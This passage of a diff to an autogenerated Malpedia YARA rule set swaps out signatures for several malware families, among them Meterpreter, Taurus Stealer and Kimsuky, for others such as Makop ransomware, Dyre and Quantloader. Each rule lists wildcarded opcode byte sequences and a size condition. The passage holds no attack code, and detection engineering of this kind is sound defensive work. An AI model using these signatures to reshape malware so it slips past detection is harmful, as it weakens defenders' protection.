+		$sequence_5 = { 33c9 663918 7507 41 }
+		$sequence_6 = { 50 57 e8???????? 33db 3c01 }
+		$sequence_7 = { a1???????? 57 e8???????? 8945fc 3bc3 }
+		$sequence_8 = { 3ac3 73fa 0fb6c0 8b44c104 e9???????? d0e9 }
+		$sequence_9 = { 0f85a0000000 33c0 85c0 7409 }
+		$sequence_10 = { 8a4e01 ffd0 884601 33c0 6689460c }
+		$sequence_11 = { fec8 32d0 8ac2 3245fe 85c9 7408 84db }
+		$sequence_12 = { 85c0 740b 8a5608 8a4e02 }
+		$sequence_13 = { 763c 8a06 2a45ff 8a5602 }
+		$sequence_14 = { 0fb6c9 8b04c8 eb81 d0e9 }
+		$sequence_15 = { e9???????? d0e9 3aca 73fa 0fb6c9 8b04c8 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1236992
 }
-rule MALPEDIA_Win_Meterpreter_Auto : FILE
+rule MALPEDIA_Win_Makop_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "33d2907b-ab63-5a72-98c0-3e3546cda7ba"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meterpreter_auto.yar#L1-L122"
+		id = "cd34e745-9497-5ffc-bd73-ecb5996e2067"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makop_ransomware_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "1631dc247baef420a5deaf156c823d0d4f3e3c68f2c5cd0e3fcbf8155c8e3d6f"
+		logic_hash = "3c7cc3419f322a8e9eb8473ecaf54fc5da0725e8a0f35ff3f90245e28389848b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 99 f7fb 043b 8801 }
-		$sequence_1 = { 0580fc5600 2ab3780b0019 43 51 360000 }
-		$sequence_2 = { 53 8b22 0c56 8b7508 57 8b7d10 }
-		$sequence_3 = { b80100f200 5d bc90909090 90 90 90 55 }
-		$sequence_4 = { b80cfdc100 15c3b8d0fc 40 005dc3 058e3053ff 7ef8 }
-		$sequence_5 = { 8be5 5d c27f00 8d4df4 8d55ec }
-		$sequence_6 = { 90 90 90 90 83775840 41 00ff }
-		$sequence_7 = { 6878e98cff ffd6 68???????? ffd6 68???????? }
-		$sequence_8 = { 8b2410 895e20 897e24 33c0 5f 5e }
-		$sequence_9 = { 7562 8b4c2418 8b441e09 01d2 f7f1 8bd8 68442410f7 }
+		$sequence_0 = { eb02 33f6 803d????????00 751f 803d????????00 7516 80fb01 }
+		$sequence_1 = { 52 50 51 e8???????? 8b542430 83c40c 68e0930400 }
+		$sequence_2 = { 52 66c7060802 66c746041066 c6460820 }
+		$sequence_3 = { 56 ff15???????? 85c0 750b 8906 32c0 5e }
+		$sequence_4 = { 83c001 84c9 75f7 2bc7 83e801 39442404 720a }
+		$sequence_5 = { ffd6 85ff 740f 85db 740b 837c242000 7404 }
+		$sequence_6 = { 8b2d???????? 3beb 742e 8b4524 3bc3 7407 50 }
+		$sequence_7 = { 7416 e8???????? 6a00 e8???????? 83c404 }
+		$sequence_8 = { e8???????? 8b442418 83c40c 8b4f0c }
+		$sequence_9 = { 742f 33c0 3906 763d 8d4c2448 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE
+rule MALPEDIA_Win_Bluelight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b177466d-4016-5e9b-b3ba-a9107347cf6f"
+		id = "9ab2727d-5272-5ca8-92a4-f15ef9dc3660"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.olympic_destroyer_auto.yar#L1-L234"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bluelight_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fa50bc2589388652e3cccf0c3f51fa7fe6dd4219d5101d2a0cb0322727b90903"
+		logic_hash = "807d4d695fef666ac0d7be4d86c77f03bfb065bf15881d360fd3af2db66d4f22"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121153,45 +121505,32 @@ rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 33c0 89542414 57 }
-		$sequence_1 = { 89442448 e8???????? 83c404 85c0 0f84e1010000 8d842494000000 }
-		$sequence_2 = { c70424???????? e8???????? bb???????? c70424???????? e8???????? bb???????? }
-		$sequence_3 = { 83c620 3b442418 72ba 8b742420 817c242403010000 }
-		$sequence_4 = { 83f807 77c4 ff248571335400 8bce e8???????? }
-		$sequence_5 = { 8bd6 897c2418 8906 e8???????? 83c404 85c0 7470 }
-		$sequence_6 = { 68???????? ba???????? e8???????? 83c418 85c0 0f84eb000000 a1???????? }
-		$sequence_7 = { 50 6a02 8bcf e8???????? 8b451c }
-		$sequence_8 = { 50 6a01 ff7510 e8???????? 83c41c 8bf0 807f4500 }
-		$sequence_9 = { 50 6a03 e8???????? 8b542440 }
-		$sequence_10 = { 6a28 50 ff15???????? 56 56 6a10 8d45ec }
-		$sequence_11 = { 50 6a02 ff75e4 ff15???????? 85c0 74c0 }
-		$sequence_12 = { 8d442424 ba09000000 50 8d4c2420 }
-		$sequence_13 = { 68???????? bb???????? e8???????? bb???????? c70424???????? e8???????? bb???????? }
-		$sequence_14 = { 8d85c0f9ffff 50 ffd7 85c0 747a ffb590f9ffff e8???????? }
-		$sequence_15 = { 6aff 6a04 6aff ff75ec 8945f0 }
-		$sequence_16 = { 50 6a05 6a00 ff742444 ff742438 }
-		$sequence_17 = { c744241cd0f25500 894c2424 c744242c00000000 751b }
-		$sequence_18 = { 0f85f5feffff ffb58cf9ffff ff15???????? 8b4df8 5f 5e 33cd }
-		$sequence_19 = { 56 8d85e4efffff 50 6a01 8d85f8efffff 50 }
-		$sequence_20 = { 50 6a01 ff742424 e8???????? 83c40c 8b7f08 }
-		$sequence_21 = { 8d542404 56 8bf1 e8???????? 85c0 7416 }
-		$sequence_22 = { 50 6a04 e8???????? 8b45fc 33d2 }
+		$sequence_0 = { ff722c 8b5104 8d4d98 897588 e8???????? 89458c 83c410 }
+		$sequence_1 = { f6433804 7403 83e0c3 0fb74f1a 0fb77718 898d4cffffff 0fb74f1c }
+		$sequence_2 = { f77720 40 3bf0 74e3 8b7dec 8b45f0 8975f8 }
+		$sequence_3 = { ff7508 ff701c 6a25 5a e8???????? 83c40c 8945d4 }
+		$sequence_4 = { 68???????? 53 e8???????? 8b55ec 83c424 85d2 7407 }
+		$sequence_5 = { f3a5 eb23 ff742420 68???????? eb92 8d4101 8bcb }
+		$sequence_6 = { e8???????? 8bd3 895da8 3955c4 0f8e24130000 8b45c8 8b4004 }
+		$sequence_7 = { e8???????? 8bd7 8bce e8???????? fe4b12 8d742418 6a14 }
+		$sequence_8 = { ff4140 5b 8be5 5d c3 55 8bec }
+		$sequence_9 = { eb26 f7462400400000 7421 8b4620 85c0 741a 8b5010 }
 
 	condition:
-		7 of them and filesize < 1392640
+		7 of them and filesize < 2191360
 }
-rule MALPEDIA_Win_Hancitor_Auto : FILE
+rule MALPEDIA_Win_Dyre_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1eb6df2e-159b-5f28-b4bd-8814d0819600"
+		id = "dfd82ad1-18fa-5929-a163-6bbf986e9f0e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hancitor_auto.yar#L1-L262"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dyre_auto.yar#L1-L226"
 		license_url = "N/A"
-		logic_hash = "065eca202c5de0c3aac505b9a1e3b15150d867b922d1e944cb9db0f3b78d775f"
+		logic_hash = "0632ac932a1fda05bb4d709a552a76b91b864a446705dbf518e55fdb6e3d3885"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -121205,49 +121544,45 @@ rule MALPEDIA_Win_Hancitor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6824040000 6a00 6a00 6a00 }
-		$sequence_1 = { 6800010000 6a40 68???????? e8???????? }
-		$sequence_2 = { 750d e8???????? 83c010 a3???????? }
-		$sequence_3 = { 6a20 68???????? 68???????? e8???????? 83c410 }
-		$sequence_4 = { 55 8bec 81ec58010000 6a44 }
-		$sequence_5 = { c745fc00000000 b901000000 85c9 7448 }
-		$sequence_6 = { 83f801 750e 57 ff15???????? 8bd8 }
-		$sequence_7 = { 8945f4 8b4df8 8b5154 52 8b4508 }
-		$sequence_8 = { a1???????? 85c0 740c ff7508 }
-		$sequence_9 = { 83f941 72ed 881d???????? c705????????01000000 }
-		$sequence_10 = { 6b55fc28 8b45f4 8b4d08 034c1014 51 6b55fc28 8b45f4 }
-		$sequence_11 = { 55 8bec 8b4d08 6a00 6a01 51 }
-		$sequence_12 = { 55 8bec a1???????? 0b05???????? 7510 }
-		$sequence_13 = { 0fb708 81e100f00000 c1f90c 66894dfc 0fb755fc 83fa03 }
-		$sequence_14 = { e8???????? 83c404 8b550c 8902 b801000000 }
-		$sequence_15 = { c60600 ff15???????? 8b3d???????? 85c0 740a }
-		$sequence_16 = { 53 56 57 8b483c 33f6 03c8 }
-		$sequence_17 = { 6bc800 8b5508 0fbe040a 8945fc 8b4dfc 83e962 894dfc }
-		$sequence_18 = { 8b413c 8b440828 03c1 ffd0 33c0 }
-		$sequence_19 = { f8 d1683a 55 08709e 891f }
-		$sequence_20 = { 05c8e40a00 8945dc 817d88dab21701 7508 8b458c 2b4588 }
-		$sequence_21 = { a1???????? 83c05b a3???????? a1???????? 0345cc a3???????? 817df8b07d0900 }
-		$sequence_22 = { 0f8d7f010000 8b45c4 0345cc 8945c4 8b45cc 0345e4 8945cc }
-		$sequence_23 = { 83e803 8945b4 eb22 833d????????00 7414 8b45e4 }
-		$sequence_24 = { 2b4588 ffd0 ebc9 a1???????? 8945b4 a1???????? 83c044 }
-		$sequence_25 = { 8b45a0 05c8d45566 7440 c745880a000000 eb07 8b4588 }
-		$sequence_26 = { 55 8bec 83ec78 a1???????? a3???????? c745c488b24000 a1???????? }
+		$sequence_0 = { 6800004000 6800000400 ff15???????? a3???????? 85c0 }
+		$sequence_1 = { 83c9ff 2bc8 8bd0 c1fa02 }
+		$sequence_2 = { 85c0 75f2 5d c3 33c0 40 }
+		$sequence_3 = { 0fb6c9 0bca 8a5001 c1e108 0fb6d2 }
+		$sequence_4 = { e8???????? 85c0 74df 33c0 40 5e }
+		$sequence_5 = { 85c0 7502 c9 c3 33c0 837dfc20 }
+		$sequence_6 = { 8b4508 ff7514 53 ff30 e8???????? }
+		$sequence_7 = { 53 8bf8 e8???????? 59 5b 8bc7 5f }
+		$sequence_8 = { 440fb69c249f000000 0fb68c249d000000 0fb694249c000000 440fb694249b000000 }
+		$sequence_9 = { 4433c0 418bc4 418bd3 c1c806 4433c0 8bc5 }
+		$sequence_10 = { 488bc8 ff15???????? 85c0 7455 4c8d442434 }
+		$sequence_11 = { 488bcb e8???????? 4c8d5e01 41b8f7ffffff 6666660f1f840000000000 488bcf }
+		$sequence_12 = { 663907 7530 8b4604 394704 7528 8b4608 394708 }
+		$sequence_13 = { 410fb649fe c1e208 440bc2 41c1e008 410bc8 49ffca 43894c0bd3 }
+		$sequence_14 = { 4433c0 418bc4 4123c5 33c8 8bc3 4403c1 418bcb }
+		$sequence_15 = { 410fb649ff 410fb611 450fb64101 c1e108 }
+		$sequence_16 = { 668b1401 668910 83c002 4e }
+		$sequence_17 = { 90 ff15???????? 8a0437 8806 46 4b }
+		$sequence_18 = { ff15???????? 8bf0 8d85d4fdffff 50 }
+		$sequence_19 = { 833d????????00 751b 6a00 6800004000 }
+		$sequence_20 = { a1???????? 6a08 50 ff15???????? 8bd8 }
+		$sequence_21 = { 8bf1 85db 7416 57 8bfa }
+		$sequence_22 = { 57 8bfa 2bfe 90 ff15???????? }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 590848
 }
-rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE
+rule MALPEDIA_Win_Deadwood_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5276d323-6b6a-5024-a34e-199bec8325fa"
+		id = "e299ec52-8e21-507f-ba5a-e3a893abbf1e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taurus_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deadwood_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "97e3f8c58ab1394f8abf2308bd9b8032a5e1fd7c003ba327319dfca1b156cb9c"
+		logic_hash = "27f6d744e976a1cbd8fe2392486788cf865733377db2356449d61f5e2be3b703"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121261,34 +121596,34 @@ rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a45e9 30440dea 41 83f915 72f3 8d45ea 885dff }
-		$sequence_1 = { e8???????? 8d4de1 c60000 e8???????? 50 8d8d38ffffff e8???????? }
-		$sequence_2 = { 8bce e8???????? 83c61c 3b750c 75f1 5e 5d }
-		$sequence_3 = { 0f2805???????? 0f1145e8 c6400201 8bb760020000 8a45e8 30440de9 41 }
-		$sequence_4 = { 51 50 6a00 8bcf e8???????? 50 8d8d44feffff }
-		$sequence_5 = { e8???????? 8b75d0 8d8554ffffff 50 8d459c 50 8d8e3c080000 }
-		$sequence_6 = { d2ea 8b4dfc d3f8 22d0 8b45f8 8810 8a450f }
-		$sequence_7 = { 03c7 8945f0 8bf0 33c0 8816 8b0c9520874300 47 }
-		$sequence_8 = { c745f42d627f79 8bca 66c745f8472d 8855fa 0fbec0 250f000080 7905 }
-		$sequence_9 = { 8986c8020000 e8???????? ff7510 8bcb e8???????? 5f 8bc6 }
+		$sequence_0 = { 720d 8b4c246c 51 e8???????? 83c404 c68424c000000002 39742460 }
+		$sequence_1 = { 8964244c 6aff 56 8d442478 33d2 895914 897110 }
+		$sequence_2 = { 80780400 7409 8b00 50 ff15???????? c3 8b4808 }
+		$sequence_3 = { 33c0 8d0c5e 668944241c bf07000000 8bc1 897c2430 c744242c00000000 }
+		$sequence_4 = { 8b4608 2b06 c1f803 3bc1 734e 53 57 }
+		$sequence_5 = { ff15???????? 6804010000 8d8df4fdffff 51 50 ff15???????? 33d2 }
+		$sequence_6 = { 33c1 a9ff070000 0f94c3 84db 7430 a900008000 740c }
+		$sequence_7 = { 6689955cffffff 39bd54ffffff 720f 8b8540ffffff 50 e8???????? 83c404 }
+		$sequence_8 = { 8b4204 8d48f8 57 56 c744242402000000 894c301c e8???????? }
+		$sequence_9 = { c7411407000000 c7411000000000 89a5d8feffff 668911 8d7802 668b10 83c002 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 1055744
 }
-rule MALPEDIA_Win_Kimsuky_Auto : FILE
+rule MALPEDIA_Win_Mrac_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4610f8d-61c2-57de-821a-2002989958af"
+		id = "6bcb64df-21fc-5709-b420-056c81f6920b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kimsuky_auto.yar#L1-L287"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mrac_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "838ee4b29f510aa7418362f03ac18e28c0399175424b76481d712ac3c06c7bee"
+		logic_hash = "ba522542908668fac0a08420f8f0d725096dd1b2d5fd44a72d657a9aa822b86c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121300,53 +121635,32 @@ rule MALPEDIA_Win_Kimsuky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c418 8d85f8feffff 6a00 50 }
-		$sequence_1 = { 6a00 e8???????? 83c418 50 ff15???????? 8b4dfc }
-		$sequence_2 = { a1???????? 33c5 8945fc 833d????????00 7413 }
-		$sequence_3 = { 740a 33ff ff15???????? eb06 ff15???????? }
-		$sequence_4 = { 6a00 8d85e8fdffff 50 8d85f0feffff 50 ff15???????? 85c0 }
-		$sequence_5 = { 75f9 2bca 51 8d85e4f5ffff 50 6a00 }
-		$sequence_6 = { ff15???????? 85c0 7516 ff15???????? 8bd8 e8???????? 0fafd8 }
-		$sequence_7 = { a3???????? 8d85dcf7ffff 50 53 ffd7 a3???????? }
-		$sequence_8 = { 83c430 8d95f0fcffff b9???????? e8???????? 8d95ecfbffff b9???????? }
-		$sequence_9 = { 4889742438 4533ff 4c89642428 4c896c2420 33f6 }
-		$sequence_10 = { ebdb 65488b042560000000 48897c2430 48896c2460 }
-		$sequence_11 = { 4533ed 4533e4 4c897c2468 e8???????? 488be8 b84d5a0000 0f1f440000 }
-		$sequence_12 = { 33d2 4883c9ff 4903de ff542468 4533c0 498bce 418d5001 }
-		$sequence_13 = { 468b540f20 468b5c0f24 4d03d1 4d03d9 666666660f1f840000000000 418b0a }
-		$sequence_14 = { 4533c0 498bce 418d5001 ffd3 488bc3 4883c440 415f }
-		$sequence_15 = { 0f8540feffff 488b6c2460 4c637d3c 33c9 }
-		$sequence_16 = { 4c89642430 c744242880000000 c744242002000000 4533c9 4533c0 }
-		$sequence_17 = { 898521010000 66898525010000 888527010000 8b742450 }
-		$sequence_18 = { 8bbda0010000 8d4702 03c2 89442450 }
-		$sequence_19 = { 894d90 8bc1 81fb00000001 0f97c0 }
-		$sequence_20 = { 83f809 8d7340 7405 be20000000 c68424a000000000 33d2 }
-		$sequence_21 = { 8bd7 3bd8 0f94c2 85d2 7419 }
-		$sequence_22 = { 488d8a38000000 e9???????? 488d8a28010000 e9???????? }
-		$sequence_23 = { 85c0 0f8432020000 8b7590 660f1f440000 }
-		$sequence_24 = { 85c0 0f94c1 85c9 0f8494020000 89bda0000000 897d30 33c0 }
-		$sequence_25 = { 6690 6644396102 488d4902 75f5 }
-		$sequence_26 = { 66c1e908 880c02 ff07 448b0f }
-		$sequence_27 = { 6690 8bd7 4d8d45f0 83ff10 }
-		$sequence_28 = { 6690 49ffc0 6642833c4000 75f5 488d95ac020000 }
-		$sequence_29 = { 6690 6644396202 488d5202 75f5 }
-		$sequence_30 = { 6690 49ffc0 6642392c42 75f6 }
+		$sequence_0 = { 2bca d1f9 eb03 83c9ff c745bc00000000 c745cc00000000 c745d007000000 }
+		$sequence_1 = { ba01000000 33c9 e8???????? c744243871000000 8bf0 8b4c2438 80f153 }
+		$sequence_2 = { 8b85e0feffff 85c0 0f849b010000 8b9dccfeffff 8b0f 48 8bd6 }
+		$sequence_3 = { 88842454030000 e8???????? 3474 8d8c2448030000 6a06 88842455030000 e8???????? }
+		$sequence_4 = { e8???????? 3451 8d8c24a00e0000 6a0b 888424b20e0000 e8???????? 344c }
+		$sequence_5 = { 6a6f 8884245d010000 e8???????? 0451 8d8c2450010000 6a6f }
+		$sequence_6 = { 3473 88842435140000 8b842420140000 0412 3465 88842436140000 8b842420140000 }
+		$sequence_7 = { 8d8c2478100000 6a15 88842494100000 e8???????? 3454 8d8c2478100000 }
+		$sequence_8 = { c644242100 e8???????? 83c404 8d4c240c 51 57 ffd0 }
+		$sequence_9 = { 888424fa130000 e8???????? 0420 8d8c24f4130000 6a7d 888424fb130000 e8???????? }
 
 	condition:
-		7 of them and filesize < 1021952
+		7 of them and filesize < 745472
 }
-rule MALPEDIA_Win_Pipemon_Auto : FILE
+rule MALPEDIA_Win_Quantloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4aaf45d7-d465-5241-bf1c-8e05e9105546"
+		id = "432b5f56-9f20-5011-836d-a160f44f614d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pipemon_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quantloader_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "81e25c1dde542bb643a4ac77dae07f1869016dd02282de1f135701fd67f912a5"
+		logic_hash = "35c517bd3ba01671a26eeca12557e31f89943cd497a56be614b2b507cc9bda11"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121360,32 +121674,38 @@ rule MALPEDIA_Win_Pipemon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { cd29 488d0d7b120200 e8???????? 488b442428 488905???????? 488d442428 }
-		$sequence_1 = { 488d0d7b120200 e8???????? 488b442428 488905???????? 488d442428 4883c008 }
-		$sequence_2 = { ff15???????? 488bf8 c7459038020000 0f1f4000 66660f1f840000000000 488d95d0010000 }
-		$sequence_3 = { c745ef41445641 33f6 488945e3 8975df }
-		$sequence_4 = { 488d15aed40100 488d4df7 e8???????? cc e8???????? cc }
-		$sequence_5 = { 33f6 8975f7 660f1f840000000000 488b0f 4c8d4df7 33c0 4889742420 }
-		$sequence_6 = { b9f4010000 ff15???????? 48c744243000000000 488d0d44470200 c744242880000000 4533c9 }
-		$sequence_7 = { 488bcf ff15???????? 85c0 0f84a0000000 }
-		$sequence_8 = { 83f801 7518 488b0d???????? 488d053b3c0100 483bc8 7405 e8???????? }
-		$sequence_9 = { 72c3 4c8b842490000000 ba01000000 498bcc ffd3 488b7c2460 488bc3 }
+		$sequence_0 = { 48 89442408 c744240401000000 c70424???????? }
+		$sequence_1 = { 83ec18 c744240800040000 c744240400000000 c70424???????? e8???????? c7442404???????? }
+		$sequence_2 = { e8???????? 89c2 c744241000000000 8d45fc }
+		$sequence_3 = { 8d45f8 89442410 c744240c19010200 c744240800000000 8b450c 89442404 }
+		$sequence_4 = { c70424???????? e8???????? ff05???????? 0fb645fb 83f801 7546 }
+		$sequence_5 = { c70424???????? e8???????? e8???????? 89442404 c70424???????? e8???????? c7442404???????? }
+		$sequence_6 = { 83ec18 8b4510 8845ff c745f800020000 }
+		$sequence_7 = { c70424???????? e8???????? c70424???????? e8???????? 0fb6c0 83f801 }
+		$sequence_8 = { 8bfe ad 85c0 75fb 2bf7 8bce }
+		$sequence_9 = { 5f 5e 5b ebed 61 }
+		$sequence_10 = { 60 837d5400 7425 64ff3530000000 59 8b490c 8b490c }
+		$sequence_11 = { 51 33c9 41 2bc2 }
+		$sequence_12 = { 8bc6 8bf7 3bc5 7403 }
+		$sequence_13 = { ab 83e903 e2db 61 }
+		$sequence_14 = { 8bfe 8bca e8???????? 33c0 50 c1c807 c104240d }
+		$sequence_15 = { 39411c 74f7 ff711c 8f4550 e8???????? 8f411c }
 
 	condition:
-		7 of them and filesize < 389120
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Ragnarok_Auto : FILE
+rule MALPEDIA_Win_Avzhan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e51b7730-611b-519c-90af-8c932bd35b31"
+		id = "c13a7c9b-4cee-5226-bade-6ae0e888daa7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ragnarok_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avzhan_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "ed2a7ae77b63d671045bd4aedbd475a1c70e0fa7ad07494ab8d71c8f930faf2f"
+		logic_hash = "71cd3a78708c6b20dbe933c0b73634c73ab7a935896c5127cd1ee325ea10e744"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121399,32 +121719,32 @@ rule MALPEDIA_Win_Ragnarok_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff35???????? ffd3 8bf8 8d8540ffffff 50 }
-		$sequence_1 = { 0fb6c9 0fb689104b4300 c1e108 33d9 8b4d10 c1e910 0fb6c9 }
-		$sequence_2 = { 238574fdffff 338568fdffff 03d9 8b8d58fdffff 13f8 8b8538fdffff 031cc588af4200 }
-		$sequence_3 = { 83c410 5d c3 e8???????? 50 e8???????? 59 }
-		$sequence_4 = { 88043e 46 83fe40 7ce6 }
-		$sequence_5 = { 0b45a0 33c1 895db0 0345e8 03c2 }
-		$sequence_6 = { 8bf8 83c40c 85ff 7576 8b4d08 8bc6 99 }
-		$sequence_7 = { 8b048528754300 5f 894df4 c644032b0a 8b5d08 753b }
-		$sequence_8 = { 334d0c 034df8 034d98 c1c00a 8945ac 8b450c c1c105 }
-		$sequence_9 = { 0f87a9000000 ff24858d6e4100 ff7510 ff750c }
+		$sequence_0 = { 88442418 c644241906 51 66895c241e }
+		$sequence_1 = { 83c418 0bc6 8944244c 66c74424500000 3935???????? }
+		$sequence_2 = { 0f85bc000000 8d84247c010000 50 e8???????? 8d8c24e8000000 }
+		$sequence_3 = { 68d0070000 ffd7 6a00 8b542414 52 }
+		$sequence_4 = { 8d7c243c c744243844000000 f3ab 8b442464 8b3d???????? }
+		$sequence_5 = { 83c418 0bc6 8944244c 66c74424500000 3935???????? 743c }
+		$sequence_6 = { ff15???????? 8b2d???????? 8b1d???????? b910000000 33c0 }
+		$sequence_7 = { 8bf0 8dbc2404020000 83c9ff 33c0 83c408 f2ae }
+		$sequence_8 = { ffd7 6a00 8b542414 52 ffd3 }
+		$sequence_9 = { 33c0 8d7c243c c744243844000000 f3ab 8b442464 8b3d???????? 83c418 }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Unidentified_037_Auto : FILE
+rule MALPEDIA_Win_Mikoponi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "12311ab5-e4c5-520c-9e45-de0627bcb40b"
+		id = "4800c6d3-16db-53d7-bb1f-1cb0040fb556"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_037_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mikoponi_auto.yar#L1-L109"
 		license_url = "N/A"
